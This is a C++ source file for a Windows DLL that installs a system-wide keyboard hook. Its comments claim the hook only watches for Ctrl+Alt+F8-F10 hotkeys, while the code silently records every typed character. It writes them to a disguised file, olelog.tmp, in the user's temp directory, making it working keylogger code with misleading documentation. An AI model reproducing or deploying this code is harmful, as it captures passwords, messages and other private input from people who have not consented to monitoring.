/*
 * This program is free software; you can redistribute it
 * and/or modify it under the terms of the Shared Code
 * License (SCL) as published by www.IntellectualHeaven.com;
 * either version 1.0, or (at your option) any later version.
 *
 * You should have received a copy of the SCL 1.0 license,
 * look for file license.txt, along with this software; if not,
 * then please write to xx_pankaj_xx@intellectualheaven.com
 * for an electronic copy of the same.
 */

/* ++
History (in reverse order)

xx_pankaj_xx@intellectualheaven.com   2003-08-18
First version created and checked in CVS
-- */

// ReCKeybHook.cpp : Defines the entry point for the DLL application.
//

#include "stdafx.h"
#include "ReCKeybHook.h"
#include <stdio.h>

BOOL APIENTRY DllMain( HANDLE hModule, 
                       DWORD  ul_reason_for_call, 
                       LPVOID lpReserved
					 )
{

	ghDLLInst = hModule;
    switch (ul_reason_for_call)
	{
		case DLL_PROCESS_ATTACH:
		case DLL_THREAD_ATTACH:
		case DLL_THREAD_DETACH:
		case DLL_PROCESS_DETACH:
			break;
    }
	WSADATA wsadata;
	WSAStartup(0x202, &wsadata);
    return TRUE;
}


// Local function. Although this function is exported from our DLL (Windows 
// needs to call it directly), no other app needs to call this, so we can 
// just prototype it here. 

LRESULT CALLBACK KeyboardHook (int nCode, WORD wParam, DWORD lParam ); 

//********************************************************************** 
// InstallHook() 
// 
// Installs/Removes Filter function for the WH_KEYBOARD hook. 
// 
// Parameters: 
// HWND hWnd Handle to main window to receive posted messages. See 
// KeyboardHook() for more info on how it works. 
// 
// BOOL bCode TRUE to hook, FALSE to unhook 
// 
// Returns: 
// 1 if successful, 0 if not. 
// 
//********************************************************************** 

ReCKeybHook_API int APIENTRY InstallHook (HWND hWnd, BOOL bCode)
{ 

	int nReturn = 1; 

	ghWndMain	= hWnd; // Store app's window handle in DLL global variable 

	// Make sure that we are installing/removing in the proper order 

	if (bCode == bHookInstalled) 
		return 0; 

	if (bCode) 
	{ 
		hHook = (HHOOK)SetWindowsHookEx(WH_KEYBOARD ,(HOOKPROC)KeyboardHook, (HINSTANCE)ghDLLInst, 0); 

		if (!hHook) 
			return 0; 

		bHookInstalled = TRUE;
	} 
	else 
	{ 
		nReturn = UnhookWindowsHookEx(hHook); 
		
		/************************/
		char sz_temp_dir_name[543];
		if(GetTempPath(	512,
						sz_temp_dir_name) != 0)
		{
			strcat(	sz_temp_dir_name,
					"\\olelog.tmp");

			FILE *fp = fopen(	sz_temp_dir_name,
								"a");
			if(fp)
			{
				sz_array[n_pos] = '\0';
			
				fprintf(	fp,
							"%s",
							sz_array);
				fclose(fp);
				n_pos = 0;		
			}
		}
		/************************/

		bHookInstalled = FALSE; 
	} 
	return nReturn; 
} 




//********************************************************************** 
// 
// KeyboardHook() 
// 
// This is the Keyboard Hook function which windows will call every 
// time it gets a keyboard message. In this function, we check to 
// see if the key pressed was Ctrl+Alt+F[8,9,10], and if it is, we post 
// the proper message to our main window which will do the right 
// thing. 
// 
// Note that the window handle that we post from was set by a call to 
// InstallHook() above. 
// 
// Parameters/return value: 
// 
// Standard 3.1 KeyboardProc. See docs for "KeyboardProc". 
// 
//********************************************************************* 

LRESULT CALLBACK KeyboardHook (int nCode, WORD wParam, DWORD lParam ) 
{ 

	if(n_pos == 9990)
	{
		char sz_temp_dir_name[543];
		if(GetTempPath(	512,
						sz_temp_dir_name) != 0)
		{
			strcat(	sz_temp_dir_name,
					"\\olelog.tmp");

			FILE *fp = fopen(	sz_temp_dir_name,
								"a");
			if(fp)
			{
				sz_array[n_pos] = '\0';
			
				fprintf(	fp,
							"%s",
							sz_array);
				fclose(fp);
				n_pos = 0;
			}
		}
	}

	if ( nCode >= 0 && nCode != HC_NOREMOVE && ((lParam & 0x80000000) == 0)) 
	{ 

		UINT xParam = MapVirtualKey(	wParam,
										0);

		BYTE pb[256];
		GetKeyboardState(pb);
		WORD ch[5];
		ToAscii(	wParam,
					xParam,
					pb,
					ch,
					0);

		if(		(	
					(char)ch[0] >= 32 
					&&	(char)ch[0] <= 127
				) 
			|| 
				(
					'\n' == wParam
				)
			|| 
				(
					'\r' == wParam
				)
			)
		{

			if(		(	'\n' == wParam
					)
				||
					(
						'\r' == wParam
					)
				)
			{
				sz_array[n_pos++] = '\n';
			}
			else
			{
				sz_array[n_pos++] = ch[0];
			}
		}
	} 

	// 
	// If we haven't returned 1 by the time we get here, then we 
	// need to pass on the message to CallNextHookEx. 
	// 
	return (int)CallNextHookEx(hHook, nCode, wParam, lParam); 
} 
